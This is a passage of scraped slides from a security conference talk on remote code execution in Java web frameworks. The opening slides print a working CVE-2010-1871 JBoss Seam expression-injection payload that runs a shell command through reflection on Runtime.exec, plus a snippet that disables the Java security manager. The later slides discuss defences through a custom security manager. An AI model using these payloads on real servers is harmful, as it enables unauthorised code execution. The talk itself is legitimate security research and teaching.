/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d %23{expressions.getClass().forName ('java.lang.Runtime').getDeclaredMethods()[19]}
![Page 73: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/73.jpg)
How do we get method’s index?
/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d %23{expressions.getClass().forName ('java.lang.Runtime').getDeclaredMethods()[19]}
/seam-booking/pwn.xhtml?pwned=public+java.lang.Process+java.lang.Runtime.exec(java.lang.String)+throws+java.io.IOException&cid=21
![Page 74: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/74.jpg)
CVE-2010-1871 exploit
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/PWNED')
![Page 75: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/75.jpg)
CVE-2010-1871 exploit
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/PWNED')
Method for Runtime.exec(String)
Method for Runtime.getRuntime()
![Page 76: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/76.jpg)
CVE-2010-1871 exploit
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(
view.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null),
'mkdir /tmp/PWNED')
Method for Runtime.exec(String)
Method for Runtime.getRuntime()
![Page 77: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/77.jpg)
CVE-2010-1871 exploit
/seam-booking/home.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[19].invoke(expressions.getClass().forName('java.lang.Runtime').getDeclaredMethods()[7].invoke(null), 'mkdir /tmp/PWNED')}
![Page 78: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/78.jpg)
Demo
![Page 79: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/79.jpg)
![Page 80: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/80.jpg)
bugsJava web frameworks arecomplexand are bound to have more
![Page 81: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/81.jpg)
![Page 82: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/82.jpg)
But there’s hopeJava Security Manager
![Page 83: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/83.jpg)
What’s Java security manager?
Singleton with a bunch of checkXXX() methods
Various classes in JRE (e.g. File, Socket, etc) have a check similar to the following:
SecurityManager security = System.getSecurityManager(); if (security != null) { security.checkXXX(argument, ...); }
![Page 84: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/84.jpg)
java.lang.ProcessBuilder
... SecurityManager security = System.getSecurityManager(); if (security != null) security.checkExec(prog); ...
![Page 85: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/85.jpg)
Are you using Java security manager?
![Page 86: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/86.jpg)
Are you using Java security manager?
20
7
No Yes
![Page 87: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/87.jpg)
Why is nobody’s using it?
![Page 88: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/88.jpg)
ProblemsOriginally designed to run untrusted code, not prevent vulnerabilities
Performance. Security manager calls happen on:
getting class loader, creating class loader
calling setAccessible() or getting declared members (used by reflection)
getting system properties, env vars
getting java.util.logging.Logger
Permissions are assigned based on paths or entities that signed JARs
![Page 89: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/89.jpg)
Problems (cont.)
Support for privileged blocks
code with higher permissions can use doPrivileged API to grant it’s permissions to the callers
Sami Koivu’s bugs
![Page 90: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/90.jpg)
How do we solve these?
Create a custom Java security manager, which:
will NOT care about classloaders, reflection* and properties
will NOT care about doPrivileged blocks, protection domains or code sources
will care about:
file access (read, write, exec)
socket access
getDeclaredField/setAccessible* reflection calls
will support per class permissions by examining stack
![Page 91: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/91.jpg)
How do we solve these?
*
![Page 92: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/92.jpg)
Reflection
* Reflection can be used to disable any security manager:
Field security = System.class.getDeclaredField("security");
security.setAccessible(true);
security.set(null, null);
![Page 93: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/93.jpg)
Pros
Will address some of the performance concerns
Will be more flexible in permission assignment (per class permissions)
Will be able to detect and prevent serious vulnerabilities:
Path traversal bugs
Command execution bugs
Externam XML entity inclusion bugs
![Page 94: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/94.jpg)
Cons
Will not prevent custom application code abuse:
BankTransacation t = new BankTransaction();
t.setAccFrom(“123”);
t.setAccTo(“Attacker’s account”):
t.setAmount(1000000);
t.commit()
Policy will have to grant privileges to JRE files (which is transparent otherwise due to doPrivileged blocks)
![Page 95: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/95.jpg)
Where’s the code?
Alpha version will be released at:
http://code.google.com/p/manas-java-security/
![Page 96: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/96.jpg)
Ideas for you
Java web frameworks have been ignored for a long time
Current support for bytecode instrumentation(BCI) via Java agents (ClassFileTransformer API) should let you
implement dynamic taint propagation
instrument String to always return true for indexOf(), contains(), etc methods to find magic characters
![Page 97: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/97.jpg)
![Page 98: Milking a horse or executing remote code in modern Java ... · executing remote code in modern Java frameworks Meder Kydyraliev blog.o0o.nu...if you thought that neither was possible,](https://reader031.vdocument.in/reader031/viewer/2022013007/5bdbeaab09d3f2bc1c8ce861/html5/thumbnails/98.jpg)
?